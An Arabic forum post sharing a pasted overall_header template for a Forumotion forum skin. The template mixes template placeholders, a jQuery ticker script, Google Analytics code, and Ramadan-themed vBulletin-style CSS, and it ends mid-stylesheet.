دليل اشهار المنتديات

overall_header قنبلة الموسم

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

overall_header قنبلة الموسم

مُساهمة من طرف irak في الجمعة أبريل 18, 2014 8:11 pm


الكود:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="rtl" lang="ar">
  <head>
    <title>{SITENAME_TITLE}{PAGE_TITLE}</title>
    <meta http-equiv="content-type" content="text/html; charset={S_CONTENT_ENCODING}" />
    <meta http-equiv="content-script-type" content="text/javascript" />
    <meta http-equiv="content-style-type" content="text/css" />
    <!-- BEGIN switch_compat_meta -->
    <meta http-equiv="X-UA-Compatible" content="IE={switch_compat_meta.VERSION}" />
    <!-- END switch_compat_meta -->
    <!-- BEGIN switch_canonical_url -->
    <link rel="canonical" href="{switch_canonical_url.CANONICAL_URL}" />
    <!-- END switch_canonical_url -->
    {META_F.....تمنع روابط التحميل الغير قانوني......CO}
    {META}
    {META_FB_LIKE}
    <meta name="title" content="{SITENAME_TITLE}{PAGE_TITLE}" />
    {T_HEAD_STYLESHEET}
    {CSS}
    <link rel="search" type="application/opensearchdescription+xml" href="/improvedsearch.xml" title="{SITENAME}" />
    <link rel="search" type="application/opensearchdescription+xml" href="{URL_BOARD_DIRECTORY}/search/improvedsearch.xml" title="{SEARCH_FORUMS}" />
    <script src="{JQUERY_PATH}" type="text/javascript"></script>
    <script src="{JS_DIR}{L_LANG}.js" type="text/javascript"></script>

    <!-- BEGIN switch_fb_login -->
    <script src="http://connect.facebook.net/{switch_fb_login.FB_LOCAL}/all.js" type="text/javascript"></script>
    <script src="{switch_fb_login.JS_FB_LOGIN}" type="text/javascript"></script>
    <!-- END switch_fb_login -->

    <!-- BEGIN switch_ticker -->
    <link type="text/css" rel="stylesheet" href="{JS_DIR}jquery/ticker/ticker.css" />
    <script src="{JS_DIR}jquery/ticker/ticker.js" type="text/javascript"></script>
    <!-- END switch_ticker -->

    <!-- BEGIN switch_ticker_new -->
    <script src="{JS_DIR}jquery/jcarousel/jquery.jcarousel.js" type="text/javascript"></script>
    <script type="text/javascript">//<![CDATA[
        /* Definir le sens de direction en fonction du panneau admin */
        var tickerDirParam = "{switch_ticker.DIRECTION}";
        var slid_vert = false;
        var auto_dir = 'next';
        var h_perso = parseInt({switch_ticker.HEIGHT});

        switch( tickerDirParam )
        {
            case 'top' :
                slid_vert = true;
                break;

            case 'left':
                break;

            case 'bottom':
                slid_vert = true;
                auto_dir = 'prev';
                break;

            case 'right':
                auto_dir = 'prev';
                break;

            default:
                slid_vert = true;
        }

        $(document).ready(function() {
            var w_cont = $('#fa_ticker_container').width();

            if (w_cont > 0)
            {
                $('#fa_ticker_container').width(w_cont);

                /* Affichage de la liste */
                $('#fa_ticker_content').css('display','block');

                /* Calcul des dimensions du conteneur et des elements */
                var width_max = $('ul#fa_ticker_content').width();
                var width_item = Math.floor(width_max / {switch_ticker.SIZE});
                var height_max = h_perso;

                /* Calcul de la hauteur maximale du conteneur en fonction des elements et de la hauteur personnalisee dans l'admin */
                $('ul#fa_ticker_content li').each( function () {
                    if ($(this).height() > height_max)
                    {
                        height_max = $(this).height();
                    }
                } );

                /* Redimensionnement des elements et des images trop larges */
                $('ul#fa_ticker_content li').width(width_item).height(height_max).find('img').each(function () {
                    if ($(this).width() > width_item)
                    {
                    var ratio        = $(this).width() / width_item;
                    var new_height = Math.round($(this).height() / ratio);
                    $(this).height(new_height).width(width_item);
                    }
                });

                /* Redimensionnement et centrage du conteneur en mode vertical */
                if (slid_vert)
                {
                    $('ul#fa_ticker_content').width(width_item).height(height_max).css('marginLeft','auto').css('marginRight','auto');
                }

                /* Initialisation du caroussel */
                $('#fa_ticker_content').jcarousel({
                        vertical: slid_vert,
                    wrap: 'circular',
                    auto: {switch_ticker.STOP_TIME},
                    auto_direction: auto_dir,
                scroll: 1,
                size: {switch_ticker.SIZE},
                height_max: height_max,
                animation: {switch_ticker.SPEED}
                });
            }
            else
            {
                $('ul#fa_ticker_content li:not(:first)').css('display','none');
                $('ul#fa_ticker_content li:first').css('list-style','none').css('text-align','center');
            }
        });
    //]]>
    </script>
    <!-- END switch_ticker_new -->

    <script type="text/javascript">//<![CDATA[
    $(document).ready(function(){
        <!-- BEGIN switch_enable_pm_popup -->
            pm = window.open('{U_PRIVATEMSGS_POPUP}', '_faprivmsg', 'HEIGHT=225,resizable=yes,WIDTH=400');
            pm.focus();
        <!-- END switch_enable_pm_popup -->
        <!-- BEGIN switch_report_popup -->
            report = window.open('{switch_report_popup.U_REPORT_POPUP}', '_phpbbreport', 'HEIGHT={switch_report_popup.S_HEIGHT},resizable=yes,scrollbars=no,WIDTH={switch_report_popup.S_WIDTH}');
            report.focus();
        <!-- END switch_report_popup -->
        <!-- BEGIN switch_ticker -->
            ticker_start({switch_ticker.HEIGHT}, {switch_ticker.SPACING}, {switch_ticker.SPEED}, '{switch_ticker.DIRECTION}', {switch_ticker.STOP_TIME});
        <!-- END switch_ticker -->
    });

    <!-- BEGIN switch_login_popup -->
        var logInPopUpLeft, logInPopUpTop, logInPopUpWidth = {LOGIN_POPUP_WIDTH}, logInPopUpHeight = {LOGIN_POPUP_HEIGHT}, logInBackgroundResize = true, logInBackgroundClass = false;
    <!-- END switch_login_popup -->

    <!-- BEGIN switch_login_popup -->
    $(document).ready( function() {
        $(window).resize(function() {
            var windowWidth = document.documentElement.clientWidth;
            var popupWidth = $("#login_popup").width();
            var mypopup = $("#login_popup");

            $("#login_popup").css({
            "left": windowWidth/2 - popupWidth/2
                });
        });
    });
    <!-- END switch_login_popup -->
    //]]>
    </script>
    {GREETING_POPUP}
    <!-- BEGIN switch_ticker_new -->
    <style>
    .jcarousel-skin-tango .jcarousel-item {
        text-align:center;
        width: 10px;
    }

    .jcarousel-skin-tango .jcarousel-item-horizontal {
        margin-right: {switch_ticker.SPACING}px;
    }

    .jcarousel-skin-tango .jcarousel-item-vertical {
        margin-bottom: {switch_ticker.SPACING}px;
    }
    </style>
    <!-- END switch_ticker_new -->
    {HOSTING_JS}
    <!-- BEGIN google_analytics_code -->
    <script type="text/javascript">
    //<![CDATA[
    var _gaq = _gaq || [];
    _gaq.push(['_setAccount', '{G_ANALYTICS_ID}']);
    _gaq.push(['_trackPageview']);
    _gaq.push(['_trackPageLoadTime']);

    <!-- BEGIN google_analytics_code_bis -->
    _gaq.push(['b._setAccount', '{G_ANALYTICS_ID_BIS}']);
    _gaq.push(['b._trackPageview']);
    <!-- END google_analytics_code_bis -->

    (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
    })();
    //]]>
    </script>
    <!-- END google_analytics_code -->
</head>
<body background="{T_BODY_BACKGROUND}" bgcolor="{T_BODY_BGCOLOR}" text="{T_BODY_TEXT}" link="{T_BODY_LINK}" vlink="{T_BODY_VLINK}">
    <!-- BEGIN hitskin_preview -->
    <div id="hitskin_preview" style="display: block;">
        <h1><img src="http://illiweb.com/fa/hitskin/hitskin_logo.png" alt="" /> Hit<em>skin</em>.com</h1>
        <div class="content">
            <p>
                {hitskin_preview.L_THEME_SITE_PREVIEW}
                <br />
                <span>{hitskin_preview.U_INSTALL_THEME}<a href="http://{hitskin_preview.U_RETURN_THEME}">{hitskin_preview.L_RETURN_THEME}</a></span>
            </p>
        </div>
    </div>
    <!-- END hitskin_preview -->

    <!-- BEGIN switch_login_popup -->
    <div id="login_popup">
        <table class="forumline" width="{LOGIN_POPUP_WIDTH}" height="{LOGIN_POPUP_HEIGHT}" border="0" cellspacing="1" cellpadding="0">
            <tr height="25">
                <td class="catLeft">
                    <span class="genmed module-title">{SITENAME}</span>
                </td>
            </tr>
            <tr height="{LOGIN_POPUP_MSG_HEIGHT}">
                <td class="row1" align="left" valign="top">
                    <div id="login_popup_buttons">
                        <form action="{S_LOGIN_ACTION}" method="get">
                            <input type="submit" class="mainoption" value="{L_LOGIN}" />
                            <input type="button" class="mainoption" value="{L_REGISTER}" onclick="parent.location='{U_REGISTER}';" />
                            <input id="login_popup_close" type="button" class="button" value="{L_DONT_DISPLAY_AGAIN}" />
                        </form>
                    </div>
                    <span class="genmed">{LOGIN_POPUP_MSG}</span>
                </td>
            </tr>
        </table>
    </div>
    <!-- END switch_login_popup -->

    <a name="top"></a>
    {JAVASCRIPT}
  
<!-- CSS Stylesheet -->
<style type="text/css" id="vbulletin_css">
/**
* vBulletin 3.8.7 CSS
* Style: 'آستايل رمضان [ مجاني ]- 2014- (تصميم F-mzaj.all-up.com)'; Style ID: 24
*/
body
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/Rmdan-z5arf_05.png) repeat;
 color: #a88c5f;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 margin: 0px 0px 0px 0px;
padding: 0px;
 
}
a:link, body_alink
{
 color: #a88c5f;
 text-decoration: none;
}
a:visited, body_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #a88c5f;
 text-decoration: none;
}
a:hover, a:active, body_ahover
{
 color: #887D6F;
 text-decoration: none;
}
.page
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/Rmdan-z5arf_05.png) repeat;
 color: #887D6F;
}
.page a:hover, .page a:active, .page_ahover
{
 background: #f5f4f3;
 color: #887D6F;
}
td, th, p, li
{
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.tborder
{
 background: #f5f4f3;
 font-family: tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 border: 1px solid #ffffff;
 
   -moz-border-radius:3px;
    -webkit-border-radius:3px;
    border-radius:3px;
 
}
.tcat
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/2.png);
 color: #887D6F;
 font: bold 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 text-align: center;
    -moz-border-radius:5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
.tcat a:link, .tcat_alink
{
 color: #887D6F;
 text-decoration: none;
}
.tcat a:visited, .tcat_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #887D6F;
 text-decoration: none;
}
.tcat a:hover, .tcat a:active, .tcat_ahover
{
 color: #a48558;
 text-decoration: none;
}
.thead
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/4.png);
 color: #443935;
 font: bold 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.thead a:link, .thead_alink
{
 color: #887D6F;
}
.thead a:visited, .thead_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #887D6F;
}
.thead a:hover, .thead a:active, .thead_ahover
{
 color: #a88c5f;
}
.tfoot
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/2.png);
 color: #a48558;
 font-family: tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.tfoot a:link, .tfoot_alink
{
 color: #a48558;
}
.tfoot a:visited, .tfoot_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #a48558;
}
.tfoot a:hover, .tfoot a:active, .tfoot_ahover
{
 color: #887D6F;
}
.alt1, .alt1Active
{
 background: url(http://www.z5arf.net/vb/Rmdan-z5arf/images/1.png);
 color: #B18E69;
 font: bold 12pt Traditional Arabic;
 border-bottom: 1px dashed #D6D1CF;
}
.alt1 a:hover, .alt1 a:active, .alt1_ahover, .alt1Active a:hover, .alt1Active a:active, .alt1Active_ahover
{
 color: #83786a;
}
.alt2, .alt2Active
{
 background: url(http://www.z5arf.net/vb/Rmdan-z5arf/images/1.png);
 color: #83786a;
 font: bold 12pt Traditional Arabic;
 border-bottom: 1px dashed #D6D1CF;
}
.alt2 a:hover, .alt2 a:active, .alt2_ahover, .alt2Active a:hover, .alt2Active a:active, .alt2Active_ahover
{
 color: #B18E69;
}
.inlinemod
{
 background: #FFFFFF;
 color: #FF0000;
 font-family: tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.wysiwyg
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/Rmdan-z5arf_05.png);
 color: #83786a;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 margin: 5px 10px 10px 10px;
 padding: 0px;
 font: bold 12pt Traditional Arabic;
 
}
.wysiwyg a:link, .wysiwyg_alink
{
 color: #83786a;
}
.wysiwyg a:visited, .wysiwyg_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #83786a;
}
.wysiwyg a:hover, .wysiwyg a:active, .wysiwyg_ahover
{
 color: #a48558;
}
textarea, .bginput
{
 background: url(http://www.z5arf.net/vb/Rmdan-z5arf/images/1.png);
 font: bold 8pt tahoma;
}
.bginput option, .bginput optgroup
{
 font-size: 7pt;
 font-family: tahoma;
}
.button
{
 color: #83786a;
 font: bold 8pt tahoma;
}
select
{
 background: #eae9e6;
 color: #a48558;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
option, optgroup
{
 font-size: 7pt;
 font-family: tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.smallfont
{
 color: #b7af86;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.time
{
 background: #e9f25e;
 color: #887D6F;
 font-family: tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.navbar
{
 color: #887D6F;
 font: bold 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.highlight
{
 color: #FFFFFF;
 font: bold 9pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.fjsel
{
 background: #f7f7f7;
 color: #887D6F;
}
.fjdpth0
{
 background: #f7f7f7;
 color: #a88c5f;
}
.panel
{
 background: url(http://www.z5arf.net/vb/Rmdan-z5arf/images/1.png);
 color: #887D6F;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 padding: 10px;
 border: 2px outset;
 border: 1px dotted #a88c5f;
}
.panelsurround
{
 background: #f1f1f1 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/2.png);
 color: #887D6F;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 border: 1px dotted #a88c5f;
}
legend
{
 color: #666666;
 font: bold 8pt tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
}
.vbmenu_control
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/3.png);
 color: #F5EFE7;
 font: bold 8pt tahoma, verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 padding: 3px 6px 3px 6px;
 white-space: nowrap;
 
}
.vbmenu_control a:link, .vbmenu_control_alink
{
 color: #F5EFE7;
 text-decoration: none;
}
.vbmenu_control a:visited, .vbmenu_control_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #F5EFE7;
 text-decoration: none;
}
.vbmenu_control a:hover, .vbmenu_control a:active, .vbmenu_control_ahover
{
 color: #443935;
 text-decoration: none;
}
.vbmenu_popup
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/Rmdan-z5arf_05.png);
 color: #887D6F;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 border: 1px dotted #a88c5f;
}
.vbmenu_option
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/Rmdan-z5arf_05.png);
 color: #a88c5f;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 white-space: nowrap;
 cursor: pointer;
}
.vbmenu_option a:link, .vbmenu_option_alink
{
 color: #a88c5f;
 text-decoration: none;
}
.vbmenu_option a:visited, .vbmenu_option_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #a88c5f;
 text-decoration: none;
}
.vbmenu_option a:hover, .vbmenu_option a:active, .vbmenu_option_ahover
{
 color: #887D6F;
 text-decoration: none;
}
.vbmenu_hilite
{
 background: #f5f4f3 url(http://www.z5arf.net/vb/Rmdan-z5arf/images/2.png);
 color: #a88c5f;
 font: 8pt tahoma,verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
 white-space: nowrap;
 cursor: pointer;
}
.vbmenu_hilite a:link, .vbmenu_hilite_alink
{
 color: #887D6F;
 text-decoration: none;
}
.vbmenu_hilite a:visited, .vbmenu_hilite_.....تمنع روابط التحميل الغير قانوني......sited
{
 color: #887D6F;
 text-decoration: none;
}
.vbmenu_hilite a:hover, .vbmenu_hilite a:active, .vbmenu_hilite_ahover
{
 color: #a88c5f;
 text-decoration: none;
}
/* ***** styling for 'big' usernames on postbit etc. ***** */
.bigusername { font-size: 10pt; }

/* ***** small padding on 'thead' elements ***** */
td.thead, th.thead, div.thead { padding: 4px; }

/* ***** basic styles for multi-page nav elements */
.pagenav a { text-decoration: none; }
.pagenav td { padding: 2px 4px 2px 4px; }


    <!-- BEGIN switch_login_popup -->
    <div id="login_popup">
        <table class="forumline" width="{LOGIN_POPUP_WIDTH}" height="{LOGIN_POPUP_HEIGHT}" border="0" cellspacing="1" cellpadding="0">
            <tr height="25">
                <td class="catLeft">
                    <span class="genmed module-title">{SITENAME}</span>
                </td>
            </tr>
            <tr height="{LOGIN_POPUP_MSG_HEIGHT}">
                <td class="row1" align="left" valign="top">
                    <div id="login_popup_buttons">
                        <form action="{S_LOGIN_ACTION}" method="get">
                            <input type="submit" class="mainoption" value="{L_LOGIN}" />
                            <input type="button" class="mainoption" value="{L_REGISTER}" onclick="parent.location='{U_REGISTER}';" />
                            <input id="login_popup_close" type="button" class="button" value="{L_DONT_DISPLAY_AGAIN}" />
                        </form>
                    </div>
                    <span class="genmed">{LOGIN_POPUP_MSG}</span>
                </td>
            </tr>
        </table>
    </div>
    <!-- END switch_login_popup -->

    <a name="top"></a>
    {JAVASCRIPT}

<!-- CSS Stylesheet -->
<style type="text/css">
        
<html lang="ar" xml:lang="ar" id="min-width" dir="rtl" xmlns="http://www.w3.org/1999/xhtml"><head><title>منتدى مستر عراق</title><meta content="text/html; charset=utf-8" http-equiv="content-type"><meta content="text/javascript" http-equiv="content-script-type"><meta content="text/css" http-equiv="content-style-type"><link href="http://im41.gulfup.com/CrXYG.ico" type="image/x-icon" rel="shortcut icon"><meta content="ar" name="language"><meta content="مجتمع فلسفة مزاج |© فلسفتنا غير المواضيع: 823, المشاركات: 2789, الأعضاء: 130 &lt;br&gt;آسفرت وآنورت ›› [ σŋє ρσωєя ] &lt;img src=http://im33.gulfup.com/bmwkG.gif&gt;&lt;img src=http://im33.gulfup.com/SCOlT.png&gt;،" name="description"><meta lang="ar" content="تصميم, برمجة, تطوير, خدمات, حصريات, منتدى, مجاني, تطويري, يسعى, لجعل, منتداكـ المجاني, من, افضل المنتديات" name="keywords"><meta content="noindex, follow" name="robots"><meta content="LPk_1jF_FQfTKgk25GObZDU0vfgx4pBXyoPAmOV_ZPQ" name="google-site-verification"><meta content="معلومات" name="title"><link type="text/css" href="/52-rtl.css" rel="stylesheet"><link title="مجتمٌع فلسَفةة مزاج |©" href="/improvedsearch.xml" type="application/opensearchdescription+xml" rel="search"><link title="بحث عن منتديات" href="http://www.ahladalil.com/ar/search/improvedsearch.xml" type="application/opensearchdescription+xml" rel="search"><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script><script type="text/javascript" src="http://illiweb.com/rsc/76/frm/lang/ar.js"></script><script type="text/javascript">$(function () {if (Number($("a.mainmenu[href^='/privmsg'] strong").text()) &gt; 0) {var a = $("a.mainmenu[href^='/privmsg'] strong").text();var b = confirm(" لديك " + a + " رساله جديده .");if (b == true) {location.href = '/privmsg?folder=inbox'};};});</script><script type="text/javascript">$(function () {if ($("#i_icon_mini_new_message").length) {var pm = $("#i_icon_mini_new_message").attr("alt").match(/\d+/);if (confirm(" لديك" + pm + " رساله جديده.")) location.href = '/privmsg?folder=inbox'};});</script><link title="مجتمٌع فلسَفةة مزاج |©" href="/improvedsearch.xml" type="application/opensearchdescription+xml" rel="search"><link title="بحث عن منتديات" href="http://www.ahladalil.com/ar/search/improvedsearch.xml" type="application/opensearchdescription+xml" rel="search"><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script><script type="text/javascript" src="http://illiweb.com/rsc/76/frm/lang/ar.js"></script><script type="text/javascript">//&lt;![CDATA[
$(document).ready(function(){});//]]&gt;</script><script type="text/javascript" src="/99948.js"></script>

<style type="text/css">
#left table.65fe2378 {border:0;border-collapse:collapse;}#left table.65fe2378 table {table-layout:fixed;border-collapse:collapse;}
</style>
</head><body vlink="#6e6e6e" text="#6e6e6e" link="#6e6e6e" bgcolor="#ffffff" background="http://illiweb.com/fa/empty.gif"><a name="top"></a><!--
 CSS Stylesheet --><style id="vbulletin_css" type="text/css">/*** Ahlamontada - phpBB2 ؛ CSS* Style: 'رمضآن 2013 | تحويل تويكس !'; Style ID: 3*/body{background: url('http://i38.servimg.com/u/f38/16/61/49/25/bg10.gif');color: #5e4a31;font: bold 14px simplified arabic;margin: 0px;padding: 0px;}a:link, body_alink{color: #5e4a31;text-decoration: none;}a:visited, body_avisited{color: #5e4a31;text-decoration: none;}a:hover, a:active, body_ahover{color: #5e4a31;text-decoration: none;}.page{background: url('http://i38.servimg.com/u/f38/16/61/49/25/bg10.gif');color: #5e4a31;}.page a:hover, .page a:active, .page_ahover{color: #80705c;}td, th, p, li{font: 11px tahoma;}.tborder{background: #f9f9f9 url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #FFFFFF;}.tcat{background: #DEDFD9 url('http://i38.servimg.com/u/f38/16/61/49/25/111.jpg');color: #FFFFFF;font: bold 13px simplified arabic;text-align:center;}.tcat a:link, .tcat_alink{color: #FFFFFF;text-decoration: none;}.tcat a:visited, .tcat_avisited{color: #FFFFFF;text-decoration: none;}.tcat a:hover, .tcat a:active, .tcat_ahover{color: #FFFFFF;text-decoration: bold;}.thead{background: #DEDFD9 url('http://i38.servimg.com/u/f38/16/61/49/25/510.png');color: #FFFFFF;font: bold 11px tahoma;}.thead a:link, .thead_alink{color: #FFFFFF;}.thead a:visited, .thead_avisited{color: #FFFFFF;}.thead a:hover, .thead a:active, .thead_ahover{color: #FFFFFF;text-decoration: bold;}.tfoot{background: #DEDFD9 url('http://i38.servimg.com/u/f38/16/61/49/25/310.jpg');color: #a09383;font: none 11px tahoma;}.tfoot a:link, .tfoot_alink{color: #a09383;text-decoration: none;}.tfoot a:visited, .tfoot_avisited{color: #a09383;text-decoration: none;}.tfoot a:hover, .tfoot a:active, .tfoot_ahover{color: #776a5b;text-decoration: none;}.alt1, .alt1Active{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #baac9e;font: bold 13px simplified arabic;border-bottom: 1px dashed #e5e0d1;}.alt1 a:hover, .alt1 a:active, .alt1_ahover, .alt1Active a:hover, .alt1Active a:active, .alt1Active_ahover{color: #e49a65;}.alt2, .alt2Active{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #baac9e;border-bottom: 1px dashed #e5e0d1;}.alt2 a:hover, .alt2 a:active, .alt2_ahover, .alt2Active a:hover, .alt2Active a:active, .alt2Active_ahover{color: #765b88;}.inlinemod{color: #e6715a;}.wysiwyg{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #baa794;font: 11px tahoma;margin: 5px 10px 10px 10px;padding: 0px;}.wysiwyg a:link, .wysiwyg_alink{color: #baa794;}.wysiwyg a:visited, .wysiwyg_avisited{color: #baa794;}.wysiwyg a:hover, .wysiwyg a:active, .wysiwyg_ahover{color: #baa794;}textarea, .bginput{background: #ffffff;color: #baa794;font: 11px tahoma;border: 1px solid #e8dfd6;border-left: 4px solid #e8dfd6;border-right: 4px solid #e8dfd6;margin: 1px;}.bginput option, .bginput optgroup{font-size: 10px;font-family: tahoma;}.button{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/310.jpg');color: #99836e;font: 11px tahoma;border: 1px solid #99836e;border-left: 4px solid #99836e;border-right: 4px solid #99836e;margin: 1px;}select{font: 11px tahoma;}option, optgroup{font-size: 11px;font-family: tahoma;}.smallfont{font: 11px tahoma;}.time{background: #FFFFFF;color: #e2935d;font: 10px tahoma;}.navbar{color: #5e4a31;font: 11px tahoma;}.highlight{color: #80705c;}.fjsel{background: #dfa44c;color: #FFFFFF;}.fjdpth0{background: #f5eee7;color: #b5a18e;}.panel{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: c7b5a2;padding: 0px;border: 0px outset;}.panel a:link, .panel_alink{color: c7b5a2;}.panel a:visited, .panel_avisited{color: c7b5a2;}.panel a:hover, .panel a:active, .panel_ahover{color: #927d68;text-decoration: bold;}.panelsurround{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #927d68;}legend{color: #e6715a;font: 11px tahoma;}.vbmenu_control{background: #DEDFD9 url('http://i38.servimg.com/u/f38/16/61/49/25/310.jpg');color: #a09383;font: 11px tahoma;padding: 3px 6px 3px 6px;white-space: nowrap;}.vbmenu_control a:link, .vbmenu_control_alink{color: #a09383;}.vbmenu_control a:visited, .vbmenu_control_avisited{color: #a09383;}.vbmenu_control a:hover, .vbmenu_control a:active, .vbmenu_control_ahover{color: #776a5b;}.vbmenu_popup{background: #DEDFD9 url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #a09383;}.vbmenu_option{background: #EFEFEF url('http://i38.servimg.com/u/f38/16/61/49/25/bg111.jpg');color: #ccc0b3;font: 11px tahoma;white-space: nowrap;cursor: pointer;}.vbmenu_option a:link, .vbmenu_option_alink{color: #ccc0b3;text-decoration: none;}.vbmenu_option a:visited, .vbmenu_option_avisited{color: #ccc0b3;text-decoration: none;}.vbmenu_option a:hover, .vbmenu_option a:active, .vbmenu_option_ahover{color: #aa9987;text-decoration: none;}.vbmenu_hilite{background: #FFFFFF;color: #dfa44c;font: 11px tahoma;white-space: nowrap;cursor: pointer;}.vbmenu_hilite a:link, .vbmenu_hilite_alink{color: #dfa44c;}.vbmenu_hilite a:visited, .vbmenu_hilite_avisited{color: #dfa44c;}.vbmenu_hilite a:hover, .vbmenu_hilite a:active, .vbmenu_hilite_ahover{color: #c7882b;}.container {width: 100%; margin: 0px auto;} .s-d_02{background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/hg10.png');background-repeat:repeat;height:348px;}.s-d_03{background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/hr10.png');height:348px;width:120px;background-repeat:no-repeat;float:right;position:relative;}.s-d_01{background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/hl10.png');height:348px;width:120px;background-repeat:no-repeat;float:left;position:relative;}a.a1{position:absolute;right: 147px; top: 28px; width: 20px; height: 22px;}a.a2{position:absolute;right: 127px; top: 28px; width: 20px; height: 22px;}a.a3{position:absolute;right: 107px; top: 28px; width: 20px; height: 22px;}a.a4{position:absolute;right: 87px; top: 28px; width: 20px; height: 22px;}a.a0{position:absolute;right: 67px; top: 28px; width: 20px; height: 22px;}a.a6{position:absolute;right: 168px; bottom: 79px; width: 42px; height: 16px;}a.a7{position:absolute;right: 127px; bottom: 79px; width: 42px; height: 16px;}.s-d_011{ background-image:url('http://im32.gulfup.com/KnM8R.png');height:348px;width:483px;background-repeat:no-repeat;margin:auto;  position:relative;}.content-left {padding-left:105px; background-image: url('http://i38.servimg.com/u/f38/16/61/49/25/tl10.gif'); background-repeat:repeat; background-position: left;}  .content-right {padding-right:105px; background-image: url('http://i38.servimg.com/u/f38/16/61/49/25/tr10.gif'); background-repeat: repeat; background-position: right;}  .content {width: 100%; margin: 0px auto; background-color:#C2C1BC;  background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/bg1010.gif'); background-repeat:repeat;}  #footer {background-image: url('http://i38.servimg.com/u/f38/16/61/49/25/fg10.gif');height:65px;width:100%;background-repeat:repeat-x; }  #footer_right {background-image: url('http://i38.servimg.com/u/f38/16/61/49/25/fr10.gif');height:65px;width:87px;float:right;background-repeat:no-repeat;}  #footer_left {background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/fl10.gif');height:65px;width:88px;float:left;background-repeat:no-repeat;position:relative;}  #footer .footer_mid{ background-image:url('http://i38.servimg.com/u/f38/16/61/49/25/fm10.gif');height:65px;width:316px;background-repeat:no-repeat;margin:auto;  position:relative;}a.a5{position:absolute;left: 1px; bottom: 1px; width: 315px; height: 65px;}html{scrollbar-base-color: #f0ebe1;scrollbar-highlight-color: #f0ebe1;scrollbar-shadow-color: #f0ebe1;scrollbar-3dlight-color: #f0ebe1;scrollbar-darkshadow-color: #f0ebe1;scrollbar-arrow-color: #db9d56;scrollbar-track-color: #5b4d62;}.bdr130button {padding: 1px;border: none;}.rainbow{ beh.....تمنع روابط التحميل الغير قانوني......or: url('http://shgap.com/vb/massy/rainbow.htc') } .saleh-info {font-family: Arial;font-size: 12px;font-weight: bold;color: #000000;background-image: url('http://shgap.com/vb/images/toolbox/info.png');background-color: #EAEEFB;background-repeat: 